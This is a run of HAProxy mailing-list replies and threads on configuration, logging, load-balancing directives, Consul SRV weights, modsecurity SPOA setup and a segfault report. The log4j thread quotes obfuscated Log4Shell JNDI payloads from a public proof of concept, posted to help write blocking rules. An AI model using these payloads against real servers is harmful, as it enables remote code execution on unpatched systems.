Re: Question about available fetch-methods for http-request

2021-08-11 Thread Igor Cicimov
Hi Maya,

Maybe try this:

http-request set-header Host context_path.ms.example.com if { path_beg 
/context_path } { hdr(Host) -i example.com }

From: Maya Lena Ayleen Scheu 
Sent: Wednesday, August 11, 2021 9:58 PM
To: haproxy@formilux.org 
Subject: Question about available fetch-methods for http-request

Hi there,

I have some questions regarding Haproxy Configuration in Version HA-Proxy 
version 2.0.23, which is not clear by reading the official documentation. I 
hope you would have some ideas how this could be solved.


What I wish to accomplish:

A frontend application is called by an url with a context path in it.
Haproxy should set a Header in the backend section with `http-request 
set-header Host` whereas the set Host contains the context_path found in the 
url-path. I try to make it clear with an example:

The called url looks like: `https://example.com/context_path/abc/etc`
Out of this url I would need to set the following Host Header: 
`context_path.ms.example.com`, while the path remains `/context_path/abc/etc`

While I find many fetch-examples for ACLs, I had to learn that most of them 
don’t work on `http-request set-header or set-env`. I tried to use `path_beg` 
or `path_reg`, which parses with errors, that the fetch method is unknown.

So something like this doesn’t work:
`http-request set-header Host 
%[path_reg(...)].ms.example.domain.com if 
host_example`

or this:
`http-request set-var(req.url_context) path_beg,lower if host_example`

Question:

I am certain that this should somehow be possible, as I found even solutions to 
set variables or Headers by urlp, cookies, etc.
What would be the explanation, why fetch methods like path_beg are not 
available in this context? And how to work around it?

Thank you in advance and best regards,
Maya Scheu

[https://c.ap4.content.force.com/servlet/servlet.ImageServer?id=0156F0DRM7G&oid=00D9000absk&lastMod=1526270984000]

Know Your Customer due diligence on demand, powered by intelligent process 
automation

Blogs |  
LinkedIn |  
Twitter

Encompass Corporation UK Ltd | Company No. SC493055 | Address: Level 3, 33 
Bothwell Street, Glasgow, UK, G2 6NL
Encompass Corporation Pty Ltd | ACN 140 556 896 | Address: Level 10, 117 
Clarence Street, Sydney, New South Wales, 2000
This email and any attachments is intended only for the use of the individual 
or entity named above and may contain confidential information
If you are not the intended recipient, any dissemination, distribution or 
copying of this email is prohibited.
If received in error, please notify us immediately by return email and destroy 
the original message.






Re: Blocking log4j CVE with HAProxy

2021-12-13 Thread Igor Cicimov
You should also take into account path that can have base64 encoded payload.

To me the best bet for protecting via haproxy is using spoa mod_security WAF 
given people have already come with a comprehensive protection rules.

Get Outlook for Android


From: Nicolas CARPi 
Sent: Tuesday, 14 December 2021, 10:27
To: Jonathan Matthews
Cc: Olivier D; HAProxy
Subject: Re: Blocking log4j CVE with HAProxy

On 13 Dec, Jonathan Matthews wrote:
> I believe there are string casing operators available, leading to
> options like "${j{$lower:N}di:ldap://...";.

Indeed. Maybe this can help, it's the "Bypass WAF" part of the POC[0]:

${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxx.xx/poc}

So if one can manage to match all of that, it could work.

Of course this block in the POC is immediatly followed by:
Don't trust the web application firewall. ;)

[0]
https://github.com/tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce#bypass-waf

Best,
~Nico



[https://c.ap4.content.force.com/servlet/servlet.ImageServer?id=0156F0DRM7G&oid=00D9000absk&lastMod=1526270984000]

Know Your Customer due diligence on demand, powered by intelligent process 
automation

Blogs |  
LinkedIn |  
Twitter

Encompass Corporation UK Ltd | Company No. SC493055 | Address: Level 3, 33 
Bothwell Street, Glasgow, UK, G2 6NL
Encompass Corporation Pty Ltd | ACN 140 556 896 | Address: Level 10, 117 
Clarence Street, Sydney, New South Wales, 2000
This email and any attachments is intended only for the use of the individual 
or entity named above and may contain confidential information
If you are not the intended recipient, any dissemination, distribution or 
copying of this email is prohibited.
If received in error, please notify us immediately by return email and destroy 
the original message.






Re: Server timeouts since HAProxy 2.2

2022-08-03 Thread Igor Cicimov
Because of keep-alive?


From: William Edwards 
Sent: Thursday, 4 August 2022, 00:26
To: haproxy@formilux.org 
Subject: Server timeouts since HAProxy 2.2

[You don't often get email from wedwa...@cyberfusion.nl. Learn why this is 
important at https://aka.ms/LearnAboutSenderIdentification ]

Hi,

Two days ago, I upgraded my first production system from HAProxy 1.8.19
to 2.2.9. Since then, many HTTP requests are hitting the server timeout.

Before upgrade:

 root@lb0-0:~# zgrep 'sD--' /var/log/haproxy.log.5.gz | wc -l
 0
 root@lb0-0:~# zgrep 'sD--' /var/log/haproxy.log.4.gz | wc -l
 0
 root@lb0-0:~# zgrep 'sD--' /var/log/haproxy.log.3.gz | wc -l
 0

After upgrade:

 # Day of upgrade
 root@lb0-0:~# zgrep 'sD--' /var/log/haproxy.log.2.gz | wc -l
 3798
 # Yesterday
 root@lb0-0:~# grep 'sD--' /var/log/haproxy.log.1 | wc -l
 127176
 # Today, so far
 root@lb0-0:~# grep 'sD--' /var/log/haproxy.log | wc -l
 85063

For this specific request, Ta ("total active time for the HTTP request")
is 3, and Tt ("total TCP session duration time, between the moment the
proxy accepted it and the moment both ends were closed") is 34 (5
minutes, the server timeout):

 Aug  3 00:31:05 lb0-0 haproxy[16884]: $ip:62223
[03/Aug/2022:00:26:05.337] fr_other~
bk_http.lyr_http-lyr02.cf.ha.cyberfusion.cloud/http-lyr02.cf.ha.cyberfusion.cloud
0/0/0/3/34 200 27992 - - sD-- 616/602/226/226/0 0/0 "GET
https://$domain/wp-content/uploads/2022/07/20220712_155022-300x300.jpg
HTTP/2.0"

The backend server indeed served the request within Ta:

 $domain $ip - - [03/Aug/2022:00:26:05 +0200] "GET
/wp-content/uploads/2022/07/20220712_155022-300x300.jpg HTTP/1.1" 200
28008 "https://$domain/stoffen/"; "Mozilla/5.0 (Windows NT 10.0; Win64;
x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0
Safari/537.36"

The timeouts only occur with 5 out of 13 backends. There is no clear
pattern, i.e. the timeouts don't come in bursts, and they aren't caused
by fixed clients.

Does anyone know why the TCP session is kept open, and the HTTP request
is not responded to by HAProxy after the backend server responded to the
HTTP request, but only after the server timeout is reached?

--
With kind regards,

William Edwards




[https://c.ap4.content.force.com/servlet/servlet.ImageServer?id=0156F0DRM7G&oid=00D9000absk&lastMod=1526270984000]

Know Your Customer due diligence on demand, powered by intelligent process 
automation

Blogs |  
LinkedIn |  
Twitter

Encompass Corporation UK Ltd | Company No. SC493055 | Address: Level 3, 33 
Bothwell Street, Glasgow, UK, G2 6NL
Encompass Corporation Pty Ltd | ACN 140 556 896 | Address: Level 10, 117 
Clarence Street, Sydney, New South Wales, 2000
Encompass Corporation US Ltd | Company No. 7946259 | Address: 5th floor, 1460 
Broadway, New York, New York, 10036
This email and any attachments is intended only for the use of the individual 
or entity named above and may contain confidential information
If you are not the intended recipient, any dissemination, distribution or 
copying of this email is prohibited.
If received in error, please notify us immediately by return email and destroy 
the original message.






Re: ACL with multi or

2023-07-29 Thread Igor Cicimov
http-request tarpit deny_status 403 unless XMail_Autodiscover || XMail_EAS || 
XMail_ECP || XMail_EWS || XMail_MAPI || XMail_OAB || XMail_OWA || XMail_RPC || 
XMail_PowerShell

Get Outlook for Android


Public


From: Henning Svane 
Sent: Sunday, July 30, 2023 9:07:29 AM
To: haproxy@formilux.org 
Subject: ACL with multi or


Hi



If all in the bracket is false then execute “http-request tarpit deny_status 
403”, but the following will not be accepted.



http-request tarpit deny_status 403 if !(XMail_Autodiscover || XMail_EAS || 
XMail_ECP || XMail_EWS || XMail_MAPI || XMail_OAB || XMail_OWA || XMail_RPC || 
XMail_PowerShell)



Error is

[ALERT](1564) : config : parsing [/etc/haproxy/haproxy.cfg:108] : error 
detected while parsing an 'http-request tarpit' condition : no such ACL : '('.





Is there a way to make it work?



Regards

Henning





[https://c.ap4.content.force.com/servlet/servlet.ImageServer?id=0156F0DRM7G&oid=00D9000absk&lastMod=1526270984000]

Dynamic KYC process automation

Website |  
LinkedIn |  
Twitter

Encompass Corporation UK Ltd | Company No. SC493055 | Address: Level 3, 33 
Bothwell Street, Glasgow, UK, G2 6NL
Encompass Corporation Pty Ltd | ACN 140 556 896 | Address: Level 10, 117 
Clarence Street, Sydney, New South Wales, 2000
Encompass Corporation US Ltd | Company No. 7946259 | Address: 5th floor, 1460 
Broadway, New York, New York, 10036
This email and any attachments is intended only for the use of the individual 
or entity named above and may contain confidential information
If you are not the intended recipient, any dissemination, distribution or 
copying of this email is prohibited.
If received in error, please notify us immediately by return email and destroy 
the original message.






Re: maxconn limit not working after reload / sighup

2023-09-20 Thread Igor Cicimov
Hi,

Think this explains it in details 
https://www.haproxy.com/blog/should-you-reload-or-restart-haproxy
Particularly this part:

Reloading starts a new HAProxy instance (or “process”) which handles new 
requests, while the old instance maintains connections until they naturally 
close or the hard-stop-after directive takes effect. This avoids severing any 
active connections and prevents any notable service disruption.

Hence anything managed in the memory of the old process like stats and counters 
will be lost since a new process gets started.


Sent from Outlook for Android


Public


From: Björn Jacke 
Sent: Thursday, September 21, 2023 9:20:03 AM
To: haproxy@formilux.org 
Subject: maxconn limit not working after reload / sighup

Hello,

I just experienced that maxconn can easily not work as expected and lead
to unavailable services. Take this example backend configuration of a
2.8.3 haproxy setup:

backend bk_example
   balance first
   server server1   192.168.4.1:8000  id 1  maxconn 10
   server server2   192.168.4.2:8000  id 2  maxconn 10
   server server3   192.168.4.3:8000  id 3  maxconn 10
   ...

Each server here is only able to handle 10 requests, if it receives more
requests it will just return an error. So usually the above
configuration works fine, server1 receives up to 10 connections, after
that connections are sent to server2, if also that has the maxconn limit
reached, server3 receives requests and so on.

So far so good. If haproxy however receives a SIGHUP because of some
reconfiguration, then all the connections to the backend servers are
kept alive but haproxy thinks that the servers have 0 connections and it
will send up to 10 new connections to backend servers, even if they
already had 10 connections, which are still active and still correctly
processed by haproxy. So each server receives up to 20 connections and
the backend servers just return errors in this case.

This is very unexpected and it looks like unintended behavior actually.
I also never heard about this and never read a warning note for such a
side effect when a haproxy reload is being done. Maybe a
server-state-file configuration might work around this problem but it
was not obvious till now that this is a requirement if maxconn is being
used. Can someone shed some light on this?

Thank you
Björn


[https://c.ap4.content.force.com/servlet/servlet.ImageServer?id=0156F0DRM7G&oid=00D9000absk&lastMod=1526270984000]

Dynamic KYC process automation

Website |  
LinkedIn |  
Twitter

Encompass Corporation UK Ltd | Company No. SC493055 | Address: Level 3, 33 
Bothwell Street, Glasgow, UK, G2 6NL
Encompass Corporation Pty Ltd | ACN 140 556 896 | Address: Level 10, 117 
Clarence Street, Sydney, New South Wales, 2000
Encompass Corporation US Ltd | Company No. 7946259 | Address: 5th floor, 1460 
Broadway, New York, New York, 10036
This email and any attachments is intended only for the use of the individual 
or entity named above and may contain confidential information
If you are not the intended recipient, any dissemination, distribution or 
copying of this email is prohibited.
If received in error, please notify us immediately by return email and destroy 
the original message.






Log lines in 2.0

2020-02-26 Thread Igor Cicimov
Hi,

I have an HTTP frontend running on specific PORT for the purpose of
external health checks, so typical:

mode http
option httplog

I noticed the log lines though for haproxy v2.0.13 I installed from the
usual Ubuntu PPA from Vincent:

# haproxy -v
HA-Proxy version 2.0.13-1ppa1~bionic 2020/02/15 - https://haproxy.org/

are different from what I'm used to seeing in v1.8 lets say, looks like
some extra lines for the headers are being logged?

Feb 27 03:37:21 ip-10-0-4-33 haproxy[21361]:
0d56:monitor-in.accept(0009)=0012 from [IP:56142] ALPN=
Feb 27 03:37:21 ip-10-0-4-33 haproxy[21361]:
0d56:monitor-in.clireq[0012:]: GET /monitor-url HTTP/1.1
Feb 27 03:37:21 ip-10-0-4-33 haproxy[21361]:
0d56:monitor-in.clihdr[0012:]: host: 10.0.4.33:PORT
Feb 27 03:37:21 ip-10-0-4-33 haproxy[21361]:
0d56:monitor-in.clihdr[0012:]: user-agent: ELB-HealthChecker/1.0
Feb 27 03:37:21 ip-10-0-4-33 haproxy[21361]:
0d56:monitor-in.clihdr[0012:]: accept: */*
Feb 27 03:37:21 ip-10-0-4-33 haproxy[21361]:
0d56:monitor-in.clicls[0012:]
Feb 27 03:37:21 ip-10-0-4-33 haproxy[21361]:
0d56:monitor-in.closed[0012:]

I don't have any log-format settings thus the default ones should be in
play so wonder if this is what I should see?

Thanks,
Igor


Re: Log lines in 2.0

2020-02-27 Thread Igor Cicimov
Hi Tim,

On Thu, Feb 27, 2020, 10:09 PM Tim Düsterhus  wrote:

> Igor,
>
> Am 27.02.20 um 05:27 schrieb Igor Cicimov:
> > Feb 27 03:37:21 ip-10-0-4-33 haproxy[21361]:
> > 0d56:monitor-in.accept(0009)=0012 from [IP:56142] ALPN=
> > Feb 27 03:37:21 ip-10-0-4-33 haproxy[21361]:
> > 0d56:monitor-in.clireq[0012:]: GET /monitor-url HTTP/1.1
> > Feb 27 03:37:21 ip-10-0-4-33 haproxy[21361]:
> > 0d56:monitor-in.clihdr[0012:]: host: 10.0.4.33:PORT
> > Feb 27 03:37:21 ip-10-0-4-33 haproxy[21361]:
> > 0d56:monitor-in.clihdr[0012:]: user-agent:
> ELB-HealthChecker/1.0
> > Feb 27 03:37:21 ip-10-0-4-33 haproxy[21361]:
> > 0d56:monitor-in.clihdr[0012:]: accept: */*
> > Feb 27 03:37:21 ip-10-0-4-33 haproxy[21361]:
> > 0d56:monitor-in.clicls[0012:]
> > Feb 27 03:37:21 ip-10-0-4-33 haproxy[21361]:
> > 0d56:monitor-in.closed[0012:]
> >
> > I don't have any log-format settings thus the default ones should be in
> > play so wonder if this is what I should see?
>
> This looks like you are running HAProxy in debug mode. Debug mode is
> enabled via the '-d' command line switch or 'debug' configuration option
> (http://cbonte.github.io/haproxy-dconv/2.1/configuration.html#debug).
>
> Best regards
> Tim Düsterhus
>

Yes I have debug option on, thanks. The thing is it is there in 1.8 too but
I don't see the same effect.

Cheers,
Igor

>


Re: Log lines in 2.0

2020-02-27 Thread Igor Cicimov
Hi Willy,

On Fri, Feb 28, 2020, 2:15 AM Willy Tarreau  wrote:

> Hi Igor,
>
> On Thu, Feb 27, 2020 at 10:36:44PM +1100, Igor Cicimov wrote:
> > > This looks like you are running HAProxy in debug mode. Debug mode is
> > > enabled via the '-d' command line switch or 'debug' configuration
> option
> > > (http://cbonte.github.io/haproxy-dconv/2.1/configuration.html#debug).
> > >
> > > Best regards
> > > Tim Düsterhus
> > >
> >
> > Yes I have debug option on, thanks. The thing is it is there in 1.8 too
> but
> > I don't see the same effect.
>
> I recently marked the debug option deprecated because it has caused a lot
> of trouble over time (services staying in foreground, spamming logs,
> filling
> file-systems with boot log files etc), and indicated that only "-d" should
> be used explicitly when you want to use the debug mode.
>
> Do you have a *real* use case of "debug" in the global section that is
> not easily solved with "-d" ? I'm asking because I'd really like to see
> this design mistake disappear, but am not (too much) stubborn.
>
> Thanks,
> Willy
>

Not a problem at all it is just something carried over from our default
test setup that has it's roots since v1.5. I'll remove it and use "-d" from
now on as intended.

Thanks,
Igor

>


Multiple balance statements in a backend

2020-04-02 Thread Igor Cicimov
Hi all,

Probably another quite basic question that I can't find an example of in
the docs (at least as a warning not to do that as it does not make sense or
bad practise) or on the net. It is regarding the usage of multiple balance
statements in a backend like this:

balance leastconn
balance hdr(Authorization)

So basically is this a valid use case where we can expect both options to
get considered when load balancing or one is ignored as a duplicate (in
which case which one)?

And in general how are duplicate statements being handled in the code,
.i.e. the first one or the last one is considered as valid, and are there
maybe any special statements that are exempt from the rule (like hopefully
balance :-) )

Thanks in advance.

Igor


Re: Multiple balance statements in a backend

2020-04-03 Thread Igor Cicimov
Hi Baptiste,

On Fri, Apr 3, 2020 at 5:28 PM Baptiste  wrote:

>
>
> On Fri, Apr 3, 2020 at 5:21 AM Igor Cicimov <
> ig...@encompasscorporation.com> wrote:
>
>> Hi all,
>>
>> Probably another quite basic question that I can't find an example of in
>> the docs (at least as a warning not to do that as it does not make sense or
>> bad practise) or on the net. It is regarding the usage of multiple balance
>> statements in a backend like this:
>>
>> balance leastconn
>> balance hdr(Authorization)
>>
>> So basically is this a valid use case where we can expect both options to
>> get considered when load balancing or one is ignored as a duplicate (in
>> which case which one)?
>>
>> And in general how are duplicate statements being handled in the code,
>> .i.e. the first one or the last one is considered as valid, and are there
>> maybe any special statements that are exempt from the rule (like hopefully
>> balance :-) )
>>
>> Thanks in advance.
>>
>> Igor
>>
>>
>
> Hi Igor,
>
> duplicate statement processing depends on the keyword: very few are
> cumulative, and most of them s "last found match".
>
> To come back to the original point, you already a chance to have 2 LB
> algorithm: if you do 'balance hdr(Authorization)' and no Authorization
> header can be found, then HAProxy fails back to a round robin mode.
> Now, if you need persistence, I think you can enable "balance leastconn"
> and then use a stick table to route known  Authorization header to the
> right server.
> More information here:
>
> https://www.haproxy.com/fr/blog/load-balancing-affinity-persistence-sticky-sessions-what-you-need-to-know/
>
> Baptiste
>

Thanks for confirming this, great stuff!

Cheers,
Igor


Re: Multiple balance statements in a backend

2020-04-03 Thread Igor Cicimov
On Fri, Apr 3, 2020 at 11:23 PM Willy Tarreau  wrote:

> On Fri, Apr 03, 2020 at 09:38:58PM +1100, Igor Cicimov wrote:
> > >> And in general how are duplicate statements being handled in the code,
> > >> .i.e. the first one or the last one is considered as valid, and are
> there
> > >> maybe any special statements that are exempt from the rule (like
> hopefully
> > >> balance :-) )
>
> And just to clarify this point, with balance like most exclusive
> directives, the last one overrides the previous ones. There's a
> reason for this that's easy to remember: the values are first
> pre-initialized from the defaults section's values, so each keyword
> needs to be able to override any previous occurrence.
>
> Willy
>

Got it, thanks Willy.

Igor


Server weight in server-template and consul dns

2020-04-20 Thread Igor Cicimov
Hi,

I have the following template in a server backend:

server-template tomcats 10 _tomcat._tcp.service.consul resolvers consul
resolve-prefer ipv4 check

This is the SRV records resolution:

# dig +short @127.0.0.1 -p 8600 _tomcat._tcp.service.consul SRV
1 10 8080 ip-10-20-3-21.node.dc1.consul.
1 10 8080 ip-10-20-4-244.node.dc1.consul.

The server's weight reported by haproxy is 1 where I expected to see 10.
Just to clarify, is this expected or there is a mixup between priority and
weight?

Thanks,
Igor


Re: doubt how to compile modsecurity module for HAproxy

2020-04-26 Thread Igor Cicimov
Hi Ricardo,

On Sun, Apr 26, 2020 at 11:36 AM Ricardo Barbosa 
wrote:

> Hello everyone, everything good? I'm studying how to enable the
> modsecurity module, but I don't know how the compilation process is done.
>
> I found this link
> https://github.com/haproxy/haproxy/tree/master/contrib/modsecurity. but I
> didn't understand how to do it, I downloaded the source code of haproxy and
> in the file called INSTALL, the instructions are to run the make command,
> followed by the "TARGET" parameter, using one of the following options:
>
> linux-glibc, linux-glibc-legacy, solaris, freebsd, openbsd, netbsd,
> cygwin, haiku, aix51, aix52, aix72-gcc, osx, generic, custom.
>
> for example:
>
> make TARGET=linux-glibc
>
> however, there is no configure script. to execute and follow the
> instructions on the website above. Does anyone have any idea how to do this?
>
> Best Regards
>
>
This is what I have come up with
https://gist.github.com/icicimov/69456f82e60ea6c53feb341f021fd089

Hope can help.

Cheers,
Igor


Re: Server weight in server-template and consul dns

2020-04-26 Thread Igor Cicimov
Hi,

On Mon, Apr 20, 2020 at 10:25 PM Igor Cicimov <
ig...@encompasscorporation.com> wrote:

> Hi,
>
> I have the following template in a server backend:
>
> server-template tomcats 10 _tomcat._tcp.service.consul resolvers consul
> resolve-prefer ipv4 check
>
> This is the SRV records resolution:
>
> # dig +short @127.0.0.1 -p 8600 _tomcat._tcp.service.consul SRV
> 1 10 8080 ip-10-20-3-21.node.dc1.consul.
> 1 10 8080 ip-10-20-4-244.node.dc1.consul.
>
> The server's weight reported by haproxy is 1 where I expected to see 10.
> Just to clarify, is this expected or there is a mixup between priority and
> weight?
>
> Thanks,
> Igor
>
>
Giving this another try. Maybe Baptiste can help to clarify which part of
the SRV record is considered as server weight, the record priority or the
record weight?

Thanks,
Igor


Re: Server weight in server-template and consul dns

2020-04-27 Thread Igor Cicimov
On Mon, Apr 27, 2020 at 10:14 PM Baptiste  wrote:

>
>
> On Mon, Apr 27, 2020 at 3:05 AM Igor Cicimov <
> ig...@encompasscorporation.com> wrote:
>
>> Hi,
>>
>> On Mon, Apr 20, 2020 at 10:25 PM Igor Cicimov <
>> ig...@encompasscorporation.com> wrote:
>>
>>> Hi,
>>>
>>> I have the following template in a server backend:
>>>
>>> server-template tomcats 10 _tomcat._tcp.service.consul resolvers consul
>>> resolve-prefer ipv4 check
>>>
>>> This is the SRV records resolution:
>>>
>>> # dig +short @127.0.0.1 -p 8600 _tomcat._tcp.service.consul SRV
>>> 1 10 8080 ip-10-20-3-21.node.dc1.consul.
>>> 1 10 8080 ip-10-20-4-244.node.dc1.consul.
>>>
>>> The server's weight reported by haproxy is 1 where I expected to see 10.
>>> Just to clarify, is this expected or there is a mixup between priority and
>>> weight?
>>>
>>> Thanks,
>>> Igor
>>>
>>>
>> Giving this another try. Maybe Baptiste can help to clarify which part of
>> the SRV record is considered as server weight, the record priority or the
>> record weight?
>>
>> Thanks,
>> Igor
>>
>>
>>
> Hi,
>
> This is the record weight.
> There is a trick for weights: DNS weight range if from 0 to 65535 while
> HAProxy weight is from 0 to 256. So basically, your DNS weight is divided
> by 256 before being applied.
> so adjust your DNS weight accordingly.
>
> Baptiste
>

Thanks Baptiste, works as per your comment!

Cheers,
Igor


Re: doubt how to compile modsecurity module for HAproxy

2020-04-30 Thread Igor Cicimov
Hi Ricardo,

On Fri, May 1, 2020 at 1:06 PM Ricardo Barbosa 
wrote:

> Of course, it would be a pleasure, but I still couldn't get it to work,
> following the igor script I even managed to build it but it is generating
> the following log.
>
> --- begin -
> 1588299971.657027 [07] 0 clients connected
> 1588299971.657000 [09] 0 clients connected
> 1588299974.851659 [00] <1> New Client connection accepted and assigned to
> worker 01
> 1588299974.851698 [01] <1> read_frame_cb
> 1588299974.851765 [01] <1> New Frame of 129 bytes received
> 1588299974.851774 [01] <1> Decode HAProxy HELLO frame
> 1588299974.851777 [01] <1> Supported versions : 2.0
> 1588299974.851779 [01] <1> HAProxy maximum frame size : 16380
> 1588299974.851780 [01] <1> HAProxy capabilities : pipelining,async
> 1588299974.851789 [01] <1> HAProxy supports frame pipelining
> 1588299974.851797 [01] <1> HAProxy supports asynchronous frame
> 1588299974.851800 [01] <1> HAProxy engine id :
> a9dd7313-bb7e-46e2-a50e-5987dfa4f0d2
> 1588299974.851803 [01] <1> Encode Agent HELLO frame
> 1588299974.851810 [01] <1> Agent version : 2.0
> 1588299974.851813 [01] <1> Agent maximum frame size : 16380
> 1588299974.851816 [01] <1> Agent capabilities :
> 1588299974.851830 [01] <1> write_frame_cb
> 1588299974.851856 [01] <1> Frame of 54 bytes send
> 1588299974.851905 [01] <1> read_frame_cb
> 1588299974.851916 [01] <1> New Frame of 617 bytes received
> 1588299974.851925 [01] <1> Decode HAProxy NOTIFY frame
> 1588299974.851927 [01] <1> STREAM-ID=12 - FRAME-ID=1 - unfragmented frame
> received - frag_len=0 - len=617 - offset=7
> 1588299974.851938 [01] Process frame messages : STREAM-ID=12 - FRAME-ID=1
> - length=610 bytes
> 1588299974.851946 [01] Process SPOE Message 'check-request'
> 1588299974.852077 [01] Encode Agent ACK frame
> 1588299974.852088 [01] STREAM-ID=12 - FRAME-ID=1
> 1588299974.852090 [01] Add action : set variable code=4294967195
> 1588299974.852098 [01] <1> write_frame_cb
> 1588299974.852125 [01] <1> Frame of 30 bytes send
> 1588299976.656052 [01] 1 clients connected
> 1588299976.657844 [04] 0 clients connected
> 1588299976.657858 [02] 0 clients connected
>
> --158831.660228 [08] 0 clients connected
> 158831.660241 [09] 0 clients connected
> 158831.660250 [01] 1 clients connected
> 158834.852590 [01] <1> read_frame_cb
> 158834.852619 [01] <1> New Frame of 49 bytes received
> 158834.852632 [01] <1> Decode HAProxy DISCONNECT frame
> 158834.852640 [01] <1> Disconnect status code : 2
> 158834.852647 [01] <1> Disconnect message : a timeout occurred
> 158834.852653 [01] <1> Peer closed connection: a timeout occurred
> 158834.852660 [01] <1> Encode Agent DISCONNECT frame
> 158834.852666 [01] <1> Disconnect status code : 2
> 158834.852671 [01] <1> Disconnect message : a timeout occurred
> 158834.852685 [01] <1> write_frame_cb
> 158834.852694 [01] Failed to write frame length : Broken pipe
> 158834.852704 [01] <1> Release client
> 158836.655592 [08] 0 clients connected
> 158836.655676 [09] 0 clients connected
> 158836.655608 [03] 0 clients connected
> 158836.655685 [01] 0 clients connected
> ---
>
> Any idea?
>
> when I compile with the new version it shows me the following message:
>
>
> config.status: executing depfiles commands
> config.status: executing libtool commands
> configure: WARNING: unrecognized options: --disable-apache2-module,
> --enable-standalone-module, --enable-pcre-study, --enable-pcre-jit,
> --with-apxs
>
>
> my config:
>
> -- haproxy.cfg
> global
> maxconn 5
> user haproxy
>
> defaults
>
> timeout connect 10s
> timeout client 30s
> timeout server 30s
> mode http
> maxconn 3000
>
> frontend my-front
> bind 0.0.0.0:80
> mode http
> filter spoe engine modsecurity config /opt/haproxy/spoe-modsecurity.conf
> http-request deny if { var(txn.modsec.code) -m int gt 0 }
> default_backend webservers
>
>
> backend spoe-modsecurity
> mode tcp
> server modsec-spoa1 192.168.10.120:12345
>
> backend webservers
> mode http
> balance roundrobin
> server web1 192.168.10.81:80 check
>
> --
>
> - spoe-modsecurity.conf --
>
> [modsecurity]
> spoe-agent modsecurity-agent
> messages check-request
> option var-prefix modsec
> timeout hello 100ms
> timeout idle 30s
> timeout processing 15ms
> use-backend spoe-modsecurity
> spoe-message check-request
> args unique-id method path query req.ver req.hdrs_bin req.body_size
> req.body
> event on-frontend-http-request
>
> -
>
> modsecurity.conf--
> SecStatusEngine On
> SecRuleEngine On
> SecRequestBodyAccess On
> SecRule REQUEST_HEADERS:Content-Type
> "(?:application(?:/soap\+|/)|text/)xml" \
>
> "id:'20',phase:1,t:none,t:lowercase,pass,nolog,ctl:requestBodyProcessor=XML"
> SecRule REQUEST_HEADERS:Content-Type "application/json" \
>
> "id:'21',phase:1,t:none,t:lowercase,

Haproxy 1.8.25 segfault

2020-05-23 Thread Igor Cicimov
Hi guys,

We are getting segfaults with haproxy 1.8.25 and thought I would ask if
this rings any bell:

segfault at 5609a853 ip 7f1b93928c10 sp 7ffd5e731fd8 error 4 in
libc-2.19.so[7f1b9388e000+1be000]

It is running on Ubuntu-14.04.2 (kernel 4.4.0-144-generic) and is happening
only on this particular one out of many dozens we have on Ubuntu-14.04 and
16.04

I have attached strace so more details upon the next crash.

Thanks,
Igor


Re: Haproxy 1.8.25 segfault

2020-05-26 Thread Igor Cicimov
Hi Willy,

On Tue, May 26, 2020 at 4:31 PM Willy Tarreau  wrote:

> Hi Igor,
>
> On Sun, May 24, 2020 at 10:35:10AM +1000, Igor Cicimov wrote:
> > Hi guys,
> >
> > We are getting segfaults with haproxy 1.8.25 and thought I would ask if
> > this rings any bell:
> >
> > segfault at 5609a853 ip 7f1b93928c10 sp 7ffd5e731fd8 error 4
> in
> > libc-2.19.so[7f1b9388e000+1be000]
>
> At this point, no unfortunately. This could be a memcpy() on a NULL
> pointer or a use after free for example.
>
> > It is running on Ubuntu-14.04.2 (kernel 4.4.0-144-generic) and is
> happening
> > only on this particular one out of many dozens we have on Ubuntu-14.04
> and
> > 16.04
> >
> > I have attached strace so more details upon the next crash.
>
> I doubt you'll see much more using strace. You'd rather attach gdb to
> it and let it run. This way when it crashes again you can issue "bt full"
> and see the whole trace.
>
>
Done. Hopefully I get something useful on the next segfault.

> It is even possible to force a core to be dumped from gdb for later
> inspection using "generate-core-file". Some people also know how to script
> it so that it automatically dumps and detaches upon crash, and limits the
> service interruption time, but I never remember how to do this, and the
> help embedded in it is next to inexistent :-/
>

Nice, good to know thanks will dig around for details.

>
> Regards,
> Willy
>

Cheers,
Igor


Re: Haproxy 1.8.25 segfault

2020-05-26 Thread Igor Cicimov
Hi Willy,

On Tue, May 26, 2020 at 4:43 PM Willy Tarreau  wrote:

> On Sun, May 24, 2020 at 10:35:10AM +1000, Igor Cicimov wrote:
> > We are getting segfaults with haproxy 1.8.25
>
> By the way, does this mean you didn't get them with a previous version
> (presumably 1.8.24) ? There aren't that many fixes between 1.8.24 and
> 1.8.25, only 23.
>

Yes, it started happening recently for some reason def on 1.8.25 only:

# zgrep -i segfault /var/log/syslog.*.gz
/var/log/syslog.4.gz:May 23 00:36:52 ip-172-31-37-74 kernel:
[30284682.620567] haproxy[14736]: segfault at 5609a853 ip
7f1b93928c10 sp 7ffd5e731fd8 error 4 in libc-2.19.so
[7f1b9388e000+1be000]
/var/log/syslog.5.gz:May 22 01:18:55 ip-172-31-37-74 kernel:
[30200805.498707] haproxy[7361]: segfault at 5575725c8fff ip
7f7d35bd4c10 sp 7b58a078 error 4 in libc-2.19.so
[7f7d35b3a000+1be000]
/var/log/syslog.5.gz:May 22 12:15:55 ip-172-31-37-74 kernel:
[30240225.673643] haproxy[15054]: segfault at 555f41a03fff ip
7f594d00fc10 sp 7ffeac111c98 error 4 in libc-2.19.so
[7f594cf75000+1be000]
/var/log/syslog.6.gz:May 21 12:08:13 ip-172-31-37-74 kernel:
[30153363.801627] haproxy[28398]: segfault at 55b4b43ccfff ip
7f5f33b53c10 sp 7ffe7fc290e8 error 4 in libc-2.19.so
[7f5f33ab9000+1be000]
/var/log/syslog.7.gz:May 20 16:04:54 ip-172-31-37-74 kernel:
[30081165.011057] haproxy[4830]: segfault at 563a387fafff ip
7fa11e6f2c10 sp 7fffaacd82c8 error 4 in libc-2.19.so
[7fa11e658000+1be000]


>
> The only one among them that I'm seeing capable of possibly having a
> side effet in unclear code parts would be this one:
>
